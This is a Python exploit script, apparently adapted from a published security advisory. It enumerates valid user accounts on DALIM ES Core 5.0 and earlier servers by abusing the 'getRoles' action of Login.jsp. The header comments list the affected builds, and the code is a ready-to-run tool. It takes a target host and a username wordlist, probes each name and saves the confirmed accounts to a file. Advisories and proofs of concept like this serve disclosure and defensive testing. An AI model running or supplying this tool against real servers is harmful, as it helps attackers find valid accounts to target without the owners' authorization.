#!/usr/bin/env python### DALIM SOFTWARE ES Core 5.0 build 7184.1 User Enumeration Weakness### Vendor: Dalim Software GmbH# Product web page: https://www.dalim.com# Affected version: ES/ESPRiT 5.0 (build 7184.1)# (build 7163.2)# (build 7163.0)# (build 7135.0)# (build 7114.1)# (build 7114.0)# (build 7093.1)# (build 7093.0)# (build 7072.0)# (build 7051.3)# (build 7051.1)# (build 7030.0)# (build 7009.0)# (build 6347.0)# (build 6326.0)# (build 6305.1)# (build 6235.9)# (build 6172.1)# ES/ESPRiT 4.5 (build 6326.0)# (build 6144.2)# (build 5180.2)# (build 5096.0)# (build 4314.3)# (build 4314.0)# (build 4146.4)# (build 3308.3)# ES/ESPRiT 4.0 (build 4202.0)# (build 4132.1)# (build 2235.0)# ES/ESPRiT 3.0## Summary: ES is the new Enterprise Solution from DALIM SOFTWARE built# from the successful TWIST, DIALOGUE and MISTRAL product lines. The ES# Core is the engine that can handle project tracking, JDF device workflow,# dynamic user interface building, volume management. Each ES installation# will have different features, depending on the license installed: online# approval, prepress workflow, project tracking, imposition management...## ES is a collaborative digital asset production and management platform,# offering services ranging from online approval to web-based production# environment for all participants of the production cycle, including brand# owners, agencies, publishers, pre-media, printers and multichannel service# provider. ES lets users plan, execute and control any aspect of media# production, regardless of the final use of the output (print, web, ebook,# movie, and others). 
# It ensures productivity and long-term profitability.
#
#
# Desc: The weakness is caused by the 'Login.jsp' script revealing which
# usernames are registered when candidate values are submitted via the
# 'login' parameter, allowing remote enumeration of valid accounts.
#
#
# Tested on: Red Hat Enterprise Linux Server release 7.3 (Maipo)
#            CentOS 7
#            Apache Tomcat/7.0.78
#            Apache Tomcat/7.0.67
#            Apache Tomcat/7.0.42
#            Apache Tomcat/6.0.35
#            Apache-Coyote/1.1
#            Java/1.7.0_80
#            Java/1.6.0_21
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2017-5425
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5425.php
#
#
# 15.06.2017
#
import argparse
import requests
import sys
from colorama import Fore, Back, Style, init
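# Per-request timeout in seconds. The original request carried no timeout and
# would block forever against a host that accepts the TCP connection but never
# answers.
_TIMEOUT = 10

# Login handler whose 'getRoles' action leaks whether a username exists.
_LOGIN_PATH = '/Esprit/public/Login.jsp'


def _looks_valid(body):
    """Return True when a Login.jsp response body indicates a registered user.

    This is the heuristic of the original PoC, kept byte-for-byte: the
    'getRoles' reply for an unknown login carries a double quote at a fixed
    offset (byte 69 of the body) and the reply for a known login does not.
    Any body shorter than 70 characters (error page, redirect, empty reply)
    also yields True, so such responses show up as false positives --
    NOTE(review): confirm hits against a live target before trusting them.

    :param body: decoded HTTP response body
    :returns: True if the body matches the "known user" shape
    """
    window = body[50:72]
    return window[19:20] != '"'


def _load_usernames(path):
    """Read candidate usernames from *path*, one per line, dropping blank lines.

    Prints an error and exits with status 1 when the file cannot be opened,
    so the caller never sees a partially initialised run.
    """
    try:
        with open(path, 'r') as handle:
            return [name for name in handle.read().splitlines() if name]
    except IOError:
        print('[!] Error opening \'' + path + '\' file.')
        sys.exit(1)


def _probe(host, scheme, username):
    """POST the 'getRoles' action for *username* and return the response body.

    Raises requests.exceptions.RequestException on any transport failure
    (connection refused, DNS failure, timeout, TLS error).
    """
    url = scheme + '://' + host + _LOGIN_PATH
    payload = {'actionRole': 'getRoles', 'login': username}
    response = requests.post(url, data=payload, timeout=_TIMEOUT)
    return response.text


def main():
    """Parse arguments, probe every candidate username, write hits to validusers.txt."""
    init()  # colorama: make the ANSI colour codes below render on Windows too
    print('User Enumeration Tool v0.3 for DALiM ES <= v5.0')
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', help='target IP or hostname', action='store', dest='target')
    parser.add_argument('-f', help='username wordlist', action='store', dest='file')
    parser.add_argument('-s', help='use HTTPS instead of plain HTTP', action='store_true',
                        dest='ssl')
    args = parser.parse_args()
    # -t and -f are both mandatory. The original counted sys.argv entries
    # instead, which misfires on '-t=host' style arguments or any extra flag.
    if not args.target or not args.file:
        parser.print_help()
        sys.exit(1)

    host = args.target
    # Plain HTTP sends every candidate username in clear text on the wire;
    # prefer -s when the target offers TLS. Certificate verification is left
    # at the requests default.
    scheme = 'https' if args.ssl else 'http'
    usernames = _load_usernames(args.file)
    print('[*] Loaded %d usernames for testing.\n' % len(usernames))

    # Hits are written as they are found, so an aborted run keeps what it had;
    # 'with' closes the file on every exit path, including sys.exit().
    with open('validusers.txt', 'w') as results:
        for username in usernames:
            print('[+] Testing username: ' + Fore.GREEN + username + Fore.RESET)
            try:
                body = _probe(host, scheme, username)
            except requests.exceptions.RequestException as exc:
                # Only transport errors are handled here; KeyboardInterrupt
                # and programming errors propagate instead of being masked by
                # the bare 'except' the original used.
                print('[!] Error connecting to ' + scheme + '://' + host + ' (' + str(exc) + ')')
                sys.exit(1)
            if _looks_valid(body):
                print('[!] Found ' + Style.BRIGHT + Fore.RED + username + Fore.RESET
                      + Style.RESET_ALL + ' as valid registered user.')
                results.write('%s\n' % username)

    print('\n[*] Enumeration completed!')
    print('[*] Valid usernames successfully written to \'validusers.txt\' file.\n')


if __name__ == '__main__':
    main()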